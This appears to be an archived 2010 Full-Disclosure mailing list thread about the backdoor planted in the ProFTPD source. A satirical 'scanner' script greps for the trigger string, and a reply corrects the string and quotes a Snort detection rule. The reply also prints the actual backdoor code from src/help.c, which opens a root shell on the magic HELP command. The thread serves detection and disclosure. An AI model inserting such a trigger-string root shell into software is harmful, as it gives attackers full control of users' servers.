| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AANLkTinGe587XuO-K-PDtLebUHHv1PSY9gO+s37Qm6Gr@mail.gmail.com>
Date: Thu, 2 Dec 2010 11:48:26 -0800
From: Michael McGraw-Herdeg <mherdeg@....edu>
To: vulnscan@...hmail.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: New Source Code Vulnerability Scanner (Free
30 Day Trial)
Hi,
You might want to make the below patch:
========
@@ -9,7 +9,7 @@
# online store.
#
# 50% of all proceeds will go to the victims that have been
-# owned by ACIDBITCHES within the past 6 years.
+# owned by ACIDBITCHEZ within the past 6 years.
#
###################################################################
@@ -17,4 +17,4 @@
export PATH=/bin
-grep -r ACIDBITCHES *
+grep -r ACIDBITCHEZ *
====
The snort rule you link to is checking for "HELP ACIDBITCHES", I
believe incorrectly, as the compromised code actually appears to
trigger on the string "ACIDBITCHEZ".
Snort sig (...BITCHES,
http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965)
""
alert tcp any any -> $HOME_NET 21 (msg:"ET CURRENT_EVENTS ProFTPD
Backdoor Inbound Backdoor Open Request
(ACIDBITCHES)"; flow:established,to_server; content:"HELP
ACIDBITCHES"; depth:16; nocase;
classtype: trojan-activity;
""
The compromise (...BITCHEZ,
http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/,
http://permalink.gmane.org/gmane.mail.postfix.user/215431) includes in
src/help.c:
""
} else
if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0);
system("/bin/sh;/sbin/sh"); }
/* List the syntax for the given target command. */
""
Thanks!
On Thu, Dec 2, 2010 at 10:18 AM, <vulnscan@...hmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Esteemed members of the Full Disclosure mailing list,
>
> In the wake of the recent compromise of the ProFTPd distribution
> server and the subsequent root-level backdoor that was placed into
> the source[0], we are proud to announce a cutting edge source code
> scanner that will help you detect backdoors in your code. This code
> is free to use for 30 days, after which time you must pay for it.
>
>
> - ------------- el8 Vuln Scan v.0.1 -------------
>
> #!/bin/bash
>
> ###################################################################
> #
> # Place this script inside the top level directory of your
> # source code repo.
> #
> # Please delete this after 30 days, or purchase a copy from our
> # online store.
> #
> # 50% of all proceeds will go to the victims that have been
> # owned by ACIDBITCHES within the past 6 years.
> #
> ###################################################################
>
> # main
>
> export PATH=/bin
>
> grep -r ACIDBITCHES *
>
> - ------------- el8 Vuln Scan v.0.1 -------------
>
>
> Thank you for helping us to help you make the Internet a safer
> place.
>
>
> [0]
> http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-
> sigs/7965
> -----BEGIN PGP SIGNATURE-----
> Charset: UTF8
> Version: Hush 3.0
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wpwEAQMCAAYFAkz34wkACgkQnCf21LwRaXbdlwP/bRK2S7SA77h05jF1cdBty4hefooL
> Zx0GOeABoqTZKnaNuKxGqwdPtg7fyNctrb7iMzehzJWBXnAD1Zik2UCujZINxeE8BFhw
> yTN9gshJZB1cdWSHwxQdiB+NqS9eRqg3s0J8i/9EjzNVkgX4EJTJZMXv9oEUDCgwW92h
> 7KFZMWU=
> =mJJI
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists